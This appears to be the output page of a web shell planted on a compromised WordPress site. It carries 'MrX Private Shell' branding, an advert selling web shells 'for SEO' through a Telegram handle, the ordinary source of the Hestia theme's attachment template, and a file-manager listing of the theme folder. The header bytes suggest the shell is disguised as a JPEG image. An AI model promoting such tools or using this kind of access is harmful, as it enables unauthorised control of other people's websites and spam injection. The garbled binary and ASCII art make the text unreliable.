����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The template for displaying attachments.
*
* @package Hestia
* @since Hestia 1.0
*/
get_header();
do_action( 'hestia_before_attachment_wrapper' )
?>
<div class="<?php echo hestia_layout(); ?>">
<div class="blog-post blog-post-wrapper">
<div class="container">
<?php
if ( have_posts() ) :
while ( have_posts() ) :
the_post();
?>
<div class="entry-attachment section section-text">
<?php
if ( wp_attachment_is_image( $post->ID ) ) :
$att_image = wp_get_attachment_image_src( $post->id, 'full' );
$srcset = wp_get_attachment_image_srcset( $post->id, 'full' )
?>
<a href="<?php echo esc_url( wp_get_attachment_url( $post->id ) ); ?>"
title="<?php the_title_attribute(); ?>" rel="attachment">
<img src="<?php echo esc_url( $att_image[0] ); ?>"
width="<?php echo esc_attr( $att_image[1] ); ?>"
height="<?php echo esc_attr( $att_image[2] ); ?>" class="attachment-medium"
alt="<?php esc_attr( $post->post_excerpt ); ?>"
<?php
if ( ! empty( $srcset ) ) {
echo 'srcset="' . esc_attr( $srcset ) . '"'; }
?>
/>
</a>
<?php else : ?>
<a href="<?php echo esc_url( wp_get_attachment_url( $post->ID ) ); ?>"
title="<?php the_title_attribute(); ?>" rel="attachment">
<?php echo basename( $post->guid ); ?>
</a>
<?php
endif;
echo '<p class="sizes">';if ( wp_attachment_is_image( get_the_ID() ) ) {
echo '<div class="image-meta">';
echo '<i class="fas fa-camera"></i> ';
/* translators: %s is Image sizes for attachment single page. */
printf( esc_html__( 'Size: %s', 'hestia' ), hestia_get_image_sizes() );
echo '</div>';
}
echo '</p>';
if ( comments_open() || get_comments_number() ) :
comments_template();
endif;
?>
</div>
<?php endwhile; ?>
<?php endif; ?>
</div>
</div>
</div>
<?php get_footer(); ?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| page-templates | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| vendor | Folder | 0755 |
|
|
| CHANGELOG.md | File | 56.87 KB | 0644 |
|
| archive-stack.php | File | 181.05 KB | 0644 |
|
| archive.php | File | 1.64 KB | 0644 |
|
| attachment.php | File | 1.98 KB | 0644 |
|
| comments.php | File | 2.06 KB | 0644 |
|
| docker-compose.ci.yml | File | 1.23 KB | 0644 |
|
| editor-style.min.css | File | 18.51 KB | 0644 |
|
| front-page.php | File | 1.11 KB | 0644 |
|
| offline.php | File | 164 B | 0644 |
|
| sidebar-woocommerce-boolean.php | File | 26.56 KB | 0644 |
|
| sidebar-woocommerce.php | File | 798 B | 0644 |
|
| sidebar.php | File | 724 B | 0644 |
|
| single-jetpack-portfolio.php | File | 688 B | 0644 |
|
| style.css | File | 176.08 KB | 0644 |
|
| toolset-config.json | File | 7 KB | 0644 |
|